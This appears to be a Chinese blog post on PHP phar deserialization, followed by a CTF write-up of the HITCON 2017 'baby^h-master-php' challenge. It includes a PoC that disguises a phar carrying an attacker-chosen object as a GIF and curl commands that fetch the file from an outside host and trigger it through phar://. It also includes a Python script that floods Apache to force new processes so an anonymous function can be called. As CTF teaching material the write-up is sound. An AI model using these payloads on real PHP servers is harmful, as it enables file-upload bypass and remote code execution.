php phar 反序列化,phar反序列化

最新推荐文章于 2024-04-01 21:58:12 发布
最新推荐文章于 2024-04-01 21:58:12 发布
阅读量288 收藏
点赞数
文章标签: php phar 反序列化

phar原理:

一个标志,格式为xxx<?php xxx;__HALT_COMPILER();?>,前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件。

ps:要将php.ini中的 phar.readonly选项设置为Off。

一个例子

序列化

class TestObject {

}

$phar = new Phar("phar.phar"); //后缀名必须为phar

$phar->startBuffering();

$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub

$o = new TestObject();

$o -> data='sheng';

$phar->setMetadata($o); //将自定义的meta-data存入manifest

$phar->addFromString("test.txt", "test"); //添加要压缩的文件

//签名自动计算

$phar->stopBuffering();

?>

ed60bef8f6234210aa880767144a6af4.png

反序列化

class TestObject{

function __destruct()

{

echo $this -> data;

}

}

include('phar://phar.phar');

?>

217d9c24bfaf504c2b41154317781e35.png

将phar伪造成其他格式的文件

class TestObject {

}

$phar = new Phar('phar.phar');

$phar -> startBuffering();

$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>'); #设置stub,增加gif文件头

$phar ->addFromString('test.txt','test'); #添加要压缩的文件

$object = new TestObject();

$object -> data = 'sheng';

$phar -> setMetadata($object); #将自定义meta-data存入manifest

$phar -> stopBuffering();

?>

b4dba763d456b646cdb987d82bf6863a.png

一道相关的ctf(orange大佬的baby^h-master-php-2017)

源码

$FLAG = create_function("", 'die(`/read_flag`);');

$SECRET = `/read_secret`;

$SANDBOX = "/var/www/data/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);

@mkdir($SANDBOX);

@chdir($SANDBOX);

if (!isset($_COOKIE["session-data"])) {

$data = serialize(new User($SANDBOX));

$hmac = hash_hmac("sha1", $data, $SECRET);

setcookie("session-data", sprintf("%s-----%s", $data, $hmac));

}

class User {

public $avatar;

function __construct($path) {

$this->avatar = $path;

}

}

class Admin extends User {

function __destruct() {

$random = bin2hex(openssl_random_pseudo_bytes(32));

eval("function my_function_$random() {"

. " global \$FLAG; \$FLAG();"

. "}");

$_GET["lucky"]();

}

}

function check_session() {

global $SECRET;

$data = $_COOKIE["session-data"];

list($data, $hmac) = explode("-----", $data, 2); #从cookie中取出data和hmac签名

if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)){ #判空

die("Bye");

}

if (!hash_equals(hash_hmac("sha1", $data, $SECRET), $hmac)) {#判断data加密之后和hmac签名是否对应

die("Bye Bye");

}

$data = unserialize($data); #反序列化

if (!isset($data->avatar)){ #如果反序列化之后的data包含的类中无avatar成员,退出

die("Bye Bye Bye");

}

return $data->avatar;

}

function upload($path) {

$data = file_get_contents($_GET["url"] . "/avatar.gif");

if (substr($data, 0, 6) !== "GIF89a") {

die("Fuck off");

}

file_put_contents($path . "/avatar.gif", $data);

die("Upload OK");

}

function show($path) {

if (!file_exists($path . "/avatar.gif")) {

$path = "/var/www/html";

}

header("Content-Type: image/gif");

die(file_get_contents($path . "/avatar.gif"));

}

$mode = $_GET["m"];

if ($mode == "upload") {

upload(check_session()); #从cookie中提取data反序列化后的avatar成员并将其内容作为路径, 请求url中的内容写到该路径下的avatar.gif文件中

} else if ($mode == "show") {

show(check_session()); #从cookie中提取data反序列化后的avatar成员并将其内容作为路径, 展示该目录下的avatar.gif

} else {

highlight_file(__FILE__);

}

思路

flag在admin类里,如果能够反序列化就能触发析构函数获取flag

解题过程

上传一个phar文件,之后使用phar解析,反序列化之后从而进入Admin类中的__destruct方法.

avatar.gif的poc

class Admin {

public $avatar = 'orz';

}

$p = new Phar(__DIR__ . '/avatar.phar', 0);

$p['file.php'] = 'idlefire';

$p->setMetadata(new Admin());

$p->setStub('GIF89a<?php __HALT_COMPILER(); ?>');

rename(__DIR__ . '/avatar.phar', __DIR__ . '/avatar.gif');

?>

将生成好的avatar.gif上传,之后会出现另一个难点.

$FLAG = create_function("", 'die(/read_flag);');

$FLAG是通过create_function创建的,并且没有函数名。但这个匿名函数是有名字的,格式是\x00lambda_%d。其中%d会从1一直进行递增,表示这是当前进程中第几个匿名函数。因此如果开启一个新的php进程,那么这个匿名函数就是\x00lambda_1,所以通过向Pre-fork模式的apache服务器发送大量请求,致使apache开启新的进程来处理请求,那么luck=%00lambda_1就可以执行函数了.

$ curl http://127.0.0.1/baby.php --cookie-jar cookie

$ curl -b cookie 'http://127.0.0.1/baby.php/?m=upload&url=http://xxx.xxx.xxx.xxx/avatar.gif'

$ python fork.py &

$ curl -b cookie "http://127.0.0.1/baby.php/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"

fork.py

# coding: UTF-8

# Author: orange@chroot.org

import requests

import socket

import time

from multiprocessing.dummy import Pool as ThreadPool

try:

requests.packages.urllib3.disable_warnings()

except:

pass

def run(i):

while 1:

HOST = 'x.x.x.x'

PORT = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))

s.sendall('GET / HTTP/1.1\nHost: xxxxx\nConnection: Keep-Alive\n\n')

# s.close()

print 'ok'

time.sleep(0.5)

i = 8

pool = ThreadPool( i )

result = pool.map_async( run, range(i) ).get(0xffff)

weixin_39651488
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化)1
08-03
虽然`file_get_contents`和`file_put_contents`可以触发文件操作,但由于路径控制有限,它们不能直接用于Phar反序列化攻击。然而,通过全局搜索`is_dir`函数,作者发现了`scanFilesForTree`方法,其中的`$dir`变量是...
PHPphar反序列化
errorr0
03-14 1696
一个不需要unserialize也能反序列化的漏洞
Phar反序列化
weixin_63231007的博客
06-06 1577
phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件,用于归档。当PHP 版本>=5.3时默认开启支持PHAR文件的。phar文件默认状态是只读,使用phar文件不需要任何的配置。而phar://伪协议即PHP归档,用来解析phar文件内容。生成、使用phar文件php.ini中需要设置 phar.readonly=off 生成特殊的phar文件,使代码运行第六行,打印flag phar文件中的metadata以序列化形式存储,解析phar文件时会进行反序列化操作。
php反序列化漏洞——phar反序列化漏洞
m0_73756016的博客
04-01 1216
类比java语言JAR是开发Java程序一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里使得部署过程十分简单。PHAR("Php ARchive")是PHP里类似于JAR的一种打包文件对于PHP 5.3 或更高版本,Phar后缀文件是默认开启支持的,可以直接使用它。文件包含:phar伪协议,可读取 .phar文件。
phar反序列化原理及利用
cike_y
02-21 1371
phar协议的利用,及漏洞的产生
phar反序列化学习
qq_53755216的博客
06-09 1336
phar反序列化 什么是phar文件 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。 PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么Phar后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它。 在软件中,PHARPHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如
master php,[hitcon2017] Baby^H-master-php-2017 复现
weixin_39625098的博客
03-13 309
分享本题自制Dockerfile : Github这题在比赛过程是0解......真的太难了...体现了Orange大大对php和中间件的深刻理解Orz 膜拜题目源码:$FLAG = create_function("", 'die(`/read_flag`);');$SECRET = `/read_secret`;$SANDBOX = "/var/www/data/" . md5("orange...
Laravel8反序列化POP链分析挖掘 .pdf
09-05
在Laravel 8中,作者提到了CVE-2021-3129,这是一个在Debug模式下可能导致任意代码执行的漏洞,它涉及到Phar反序列化。然而,随着框架版本的升级,Laravel对某些类添加了`__wake`方法以限制反序列化,这使得传统的...
攻击者是如何将PHP Phar包伪装成图像以绕过文件类型检测的(推荐)
01-20
在运行PHAR包时,由于PHP会对其内容进行反序列化,从而允许攻击者启动一个PHP对象包含链。其中,最有趣的部分在于如何触发有效载荷:归档上的任何文件操作都将执行它。最后,攻击者根本无需关心文件名
serp-scraper:一个库,用于提取,序列化和存储在搜索引擎结果页上抓取的数据
05-19
php composer.phar install支持的搜索引擎谷歌ing 问雅虎支持的序列化格式JSON格式XML格式YAML法律免责声明在任何情况下,我均不承担任何因用户使用或滥用本软件引起的或与之有关的直接,间接,偶然,结果,特殊或...
Phar反序列化详细总结
2301_76690905的博客
11-09 182
phar协议,phar.phar包,和保存在phar包中的文件test.txt。被压缩的文件内容,在没有特殊要求的情况下,这个被压缩的文件内容可以随便写的,因为我们利用这个漏洞主要是为了触发它的反序列化。有file_exists(),fopen(),file_get_contents(),file()等文件操作的函数。Phar文件中被压缩的文件的一些信息,其中Meta-data部分的信息会以序列化的形式储存(当文件操作函数通过。,放在文件末尾,如果我们修改了文件的内容,之前的签名就会无效,就需要。
phar反序列化
09-23 214
通常我们在利用反序列化漏洞的时候,只能将序列化后的字符串传入unserializ(),随着代码安全性越来越高,利用难度也越来越大。利用phar文件会以序列化的形式储存用户自定义的meta-data这一特性,扩展了php反序列漏洞的攻击面。该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直...
初学phar反序列化
m0_63253040的博客
09-20 646
两个功能点,一个任意文件读取(file_get_contents),一个文件上传(上传格式为白名单图片,内容不含__HALT_COMPILER();来识别这个文件是Phar文件,对于其他是无限制的,这个时候也就意味着我们即使对文件后缀和文件名进行更改,其实质仍然是Phar文件。来识别Phar文件,那么出于安全考虑,即为了防止Phar反序列化的出现,可能就会对这个进行过滤,示例代码如下。我们利用Phar反序列化的第一步就是需要上传Phar文件到服务器,而如果服务端存在防护,比如这种。
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6777
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
phar反序列化的简单总结
m0_62422842的博客
04-22 701
前言 一般我们在做题时,看到代码中有serialize函数或者unserialize函数,我们肯定会想到php反序列化,那如果代码中没有这两个函数,它0是不是也能进行反序列化? 来自Secarma的安全研究员Sam Thomas发现了一种新的漏洞利用方式—phar反序列化。不用serialize函数就能进行序列化操作,这其实就跟phar://伪协议和phar 文件的打包机制有关。 什么是phar 它就是一种php程序的一种打包文件,类似与java中的jar文件,无需解压,直接通过phar://伪协
php归档格式:phar文件详解(创建、使用、解包还原提取)
热门推荐
云客的技术博客【云游天下 做客四方】
02-10 1万+
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHP 的 Web 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用,
phar反序列化poc
最新发布
05-21
Phar反序列化漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行反序列化攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值